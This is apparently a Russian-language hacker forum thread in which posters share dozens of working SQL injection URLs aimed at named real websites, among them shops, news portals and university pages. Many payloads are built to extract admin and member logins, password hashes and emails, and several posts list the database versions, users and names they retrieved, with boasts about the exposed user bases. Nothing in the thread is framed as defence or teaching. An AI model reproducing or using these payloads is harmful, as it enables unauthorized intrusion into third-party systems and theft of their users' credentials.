SQL Инъекции

http://www.autoprava.ru/fototop/model.php?id=616%27+UNION+SELECT+1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16+LIMIT+1,1+--+

можно похакать девченку в гелике)

 

Code:

http://www.echoes.org.uk/magazine.php?id=-358'+union+select+1,2,3,4,5+from+information_schema.tables+--+

Code:

http://pakistantimes.net/pt/detail.php?newsId=-1108+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+information_schema.tables+--+

Code:

http://balicarholiday.com/daftar_tour.php?kategoriID=-2+uNIon+sELEct+1,2,tAble_name,4,5+from+information_schema.tables+--+

Code:

http://makeupartistindonesia.net/detail_event.php?eventID=-9418+uNIon+select+1,2,3,4,5,concat_ws(0x3a3a,name,password,is_private,email,peer,is_admin),7,8,9,10,11,12,13,14,15,16+from+users+--+&vendorID=11370418

Code:

http://www.stomp.it/default.php?idref=-81+union+select+1,concat_ws(0x3a3a,userid,paswid)+from+,4,5,6+from+admin+--+

Code:

http://www.matteite.com/en/matteite.php?idCat=51+union+select+1,concat_ws(0x3a3a,login,password),3,4,5,6+from+admin+--+

Code:

http://www.belmedpreparaty.com/prices/registr1.php?rub_id=-25+union+select+1,user()+--+&%F1ountry_id=1

Code:

http://www.namo.in.th/detail_product.php?productid=-89+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+namo_user_level+--+

Code:

http://www.cpacdsign.com/detail_product.php?productid=-119+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,mb_id,mb_login,mb_password,mb_email,mb_accept,mb_status,mb_surname,mb_education,mb_province),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+cpac_member+--+

Code:

http://www.cameroon-info.net/cin_rubriques.php?rub_id=-757+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12+from+information_schema.tables+--+

Code:

http://www.italiepunt.nl/shop/new_index.php?adviceselection=-72+union+select+1,2+from+information_schema.tables+--+

Code:

http://www.johnraffertyphotography.com/gallery.php?view_image=141&view_category=-17+union+select+user()+--+&start_img=0

Code:

http://www.docteurclaude.fr/rubrique.php?RUB_ID=-4+union+select+1,2,3,4,5,6,7,8,9+/*+

Code:

http://bodyspace.net/artigos.php?rub_id=-138+union+select+1,2,3,4,concat_ws(0x3a3a,username,user_password,user_passchg,user_pass_convert,user_email,user_login_attempts,user_type,group_id,user_permissions,user_perm_from),6+from+forum2_users+limit+7,1+--+

Code:

http://www.e-boat.it/default.php?idref=36&ida=227+uNIon+sELect+1,2,3,4,5,6,7+--+

Code:

http://cube3.securesites.net/_ios_seacube/default.php?idref=19&ecom=11&ecomid=31+union+select+1,2,3,4,5,6,7,8,9+--+

Code:

http://www.gavazzeni.it/index.php?idref=420&mainid=431+union+select+1,2,3+--+&open=420&PHPSESSID=9946bcf29a0b0ad8d69799d3055b352a

Code:

http://www.leclaireurhebdo.com/rubrique.php?PAGE_ID=6&RUB_ID=-1+union+select+1,group_concat(table_name),3+from+information_schema.tables+--+

Code:

http://www.alice-miller.com/articles_en.php?lang=en&nid=-101+union+select+1,group_concat(table_name),3,4,5+from+information_schema.tables+--+&grp=11

Code:

http://www.essaygifts.co.za/product-list.php?id=-43+union+select+1,2,3,4,5,6+from+information_schema.tables+--+

Code:

http://www.rsd-electronic.com/en/product-details.php?art=-4175+union+select+1,2,3,4,5,6,7+--+

Code:

http://www.energypluspumps.eu/en/cesky/product_lists/product-list.php?id=53+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+--+

Code:

http://depolamp.ru/buy.php?id=-13+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+information_schema.tables+--+&make=show

Code:

http://jtime.ru/buy.php?ID=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+

Code:

http://www.wisedentist.com/d2d/browse.php?bcat=-6+union+select+1,username,password,4,5,6,7,8+from+admin+--+

 

edu one

http://www.educ.msstate.edu/events/detail.php?id=-669+UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39--

 

joomlaextensions.co.in PR-4

Code:

http://joomlaextensions.co.in/index.php?template=system&option=com_jeeventcalendar&view=event&Itemid=155&event_id=-1%22+UNION+ALL+SELECT+1,version%28%29,user%28%29,database%28%29,5,6,7,8+FROM+jos_users%23

version:5.0.87-community
database:joomlaex_joomextenstions
user:joomlaex_jextens@localhost

pescanova.com PR-5

Code:

http://www.pescanova.com/contenido.php?idmenu=40&id_noticia=6+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14+--+

Code:

5.0.33-log:[email protected]:BD276183005

 

http://www.kai3fan.net/wiki/version.php?id=-4+union+select+1,2,3,4,group_concat(0x0b,column_name),6+from+information_schema.columns+where+table_name=0x6B61695F75736572
kai_user::id,name,passwort,jobids,realname,time,rank,mail,lastvisit,signatur
MySQL 5.0.26
http://www.kai3fan.net/wiki/version.php?id=-4+union+select+1,2,3,4,group_concat(0x0b,id,0x3a,name,0x3a,passwort),6+from+kai_user+--

 

PR: 6

_http://physics.anu.edu.au/nuclear/personnel.php?id=(1,2)=(select*from(select+name_const((select+concat_ws(0x3a,version(),user())),1),name_const((select+concat_ws(0x3a,version(),user())),1))a)

PR: 7

_http://www.stat.washington.edu/people/people.php?id=-75+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10+--+

 

Code:

http://www.script-php.info/index.php?link=9&id=-45+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),version(),database())

database:yandexn_scripts@localhost
version:5.0.67-community
user:yandexn_scripts

Code:

http://runetbusiness.com//index.php?link=4&id=-5+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),version(),database())

database:yandexn_nn@localhost
version:4.1.22-standard
user:yandexn_runetbusiness

 

http://www.insk.ru/news_view.php?news_id=-15+union+select+1,concat(login,0x3a,passwd,0x3a,email),3+from+users+--+
Вся база данных юзеров с емайлами

http://www.paramountcenter.org/stage.php?id=-432+union+select+1,2,concat(name,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16+from+admin+limit+1

 

pescanova.it PR-2

Code:

http://www.pescanova.it/news.php?section=90&action=show&id=-27+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6+--+

Code:

4.1.20:admin_pescan@web010101:pescan

oasibioresearchfoundation.org PR-2 Blind

Code:

http://www.oasibioresearchfoundation.org/index.php?patologia=11+and+substring%28version%28%29,1,1%29=4

 

Code:

http://www.lamongols.com/components/com_jcalpro/cal_popup.php?extmode=view&extid=9999'+union+select+1,2,concat(convert(name+using+latin1),0x3a,convert(password+using+latin1)),concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+--+

version: 5.1.42
user: anugaasc_lamon@localhost
database: anugaasc_lamongols

При запросе вежливо выдает имя и пасс админа в md5 + salt

 

eDU-DU

Version: 5.0.45
User: [email protected]

 

Code:

http://www.chrisjordan.com/current_set2.php?id=11'+and+1=2+UNION+SELECT+1,2,3,4,5--+'

database:cjordanwebdata
version:4.1.22-max-log
user:[email protected]

 

Code:

http://brunswickncyardsales.com/links.php?cat=-18/**/union/**/all/**/select/**/666,666,666,concat_ws(0x3a,member_name,member_password,email)kaMtiEz,@@version,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666/**/from/**/members--

Code:

http://www.dreamscity.net/dlil/links_showcat.php?id=3%20and%201=0%20UNION%20SELECT%201,concat(username,0x3a,password),3,4%20from%20admin

 

jenniferlynn.com PR-2

Code:

http://www.jenniferlynn.com/gig-guide/gigs?event_id=-27+union+select+%201,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28

Code:

5.0.51a-24+lenny2-log:jlynn@localhost:jlynn

highervibrationliving.com

Code:

http://highervibrationliving.com/wordpress/?page_id=19&event_id=-123+union+select+%201,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2
8

Code:

5.0.67.d7-ourdelta-log:[email protected]:hig0933807564279

 

Code:

http://talismanov.net/news_view.php?news_id=-9+union+select+1,concat_ws(0x3a,version(),user()),3,4,5,6,7+from+information_schema.tables--

http://dedmorozov.net/news_view.php?news_id=-9+union+select+1,concat_ws(0x3a,version(),user()),3,4,5,6,7+from+information_schema.tables--

Два с одной базы

Code:

5.0.45:u15364@localhost

 

Я больше не буду баянить=)

Code:

http://www.isf-roma.org/page_index.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

database:isfdb
version:4.0.24_Debian-10-log
user:isfanonymous@localhost

Code:

http://www.gripperbybauer.com/viewItem.php?id=-1+UNION+SELECT+1,2,3,4--

database:grippers
version:5.0.37-log
user:grippers@localhost

Code:

http://www.kinkadegalleries.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--

database:kinkad
version:4.0.27-log
user:kinkad@localhost

Code:

http://www.historicflyingclothing.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--

database:hfcc
version:5.0.22-Debian_0ubuntu6.06.10-log
user:[email protected]

Code:

http://www.rzmilitaria.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--

database:rzmilitaria
version:5.0.22-Debian_0ubuntu6.06.10-log
user:[email protected]

Code:

http://www.regimentals.co.uk/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5,6--

database:regimentals
version:4.1.19
user:[email protected]

Code:

http://www.theoldbrigade.co.uk/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5,6--

database:theoldbrigade
version:4.1.19
user:[email protected]

Code:

http://www.hiscoll.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--

database:hiscoll
version:5.0.22-Debian_0ubuntu6.06.10-log
user:[email protected]

Code:

http://www.bluebellmilitaria.co.uk/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--

database:bluebell
version:5.0.22-Debian_0ubuntu6.06.10-log
user:[email protected]

Code:

http://www.pastgloriesmilitaria.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--

database:pastglories
version:5.0.22-Debian_0ubuntu6.06.10-log
user:[email protected]

Code:

http://www.kinkadegalleries.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--

database:kinkad
version:4.0.27-log
user:kinkad@localhost

Code:

http://www.regimentals.co.uk/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5,6--

database:regimentals
version:4.1.19
user:[email protected]

Code:

http://www.homefrontcollection.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--

database:homefront
version:5.0.22-Debian_0ubuntu6.06.10-log
user:[email protected]

Code:

http://glamourofpearls.com/site/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9--

database:glamourofpearls_com
version:4.0.27
user:glamourofpearls@localhost

Code:

http://www.lastreich.co.uk/viewitem.php?id=-1+UNION+SELECT+1,2,3--

database:lastreich
version:5.0.22-Debian_0ubuntu6.06.10-log
user:[email protected]

Code:

http://www.adfmilitaria.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--

database:adfmilitaria
version:5.0.22-Debian_0ubuntu6.06.10-log
user:[email protected]

Code:

http://mycommissionbid.com/bid/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11--

database:mybid
version:5.0.22-Debian_0ubuntu6.06.10-log
user:[email protected]

 

Database Version: 5.0.51a-24+lenny2-log
Database name: heelezTH
User name: u_heelezTH@localhost

 

Вот решил еще одну инъекцию ру сайта выложить

user: [email protected]
DataBase: u12625_postsov
Version: 5.0.67-log

 

RU shop's

Одминко www.site/admin/

 

Code:

http://reviews.techloop.net/review.php?id=-1+Union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,version(),27,database(),29,user(),31,32,33,34,35,36,37,38,39,40,41+--+

version: 5.0.67
database: techloop_db
user: techloop_db@localhost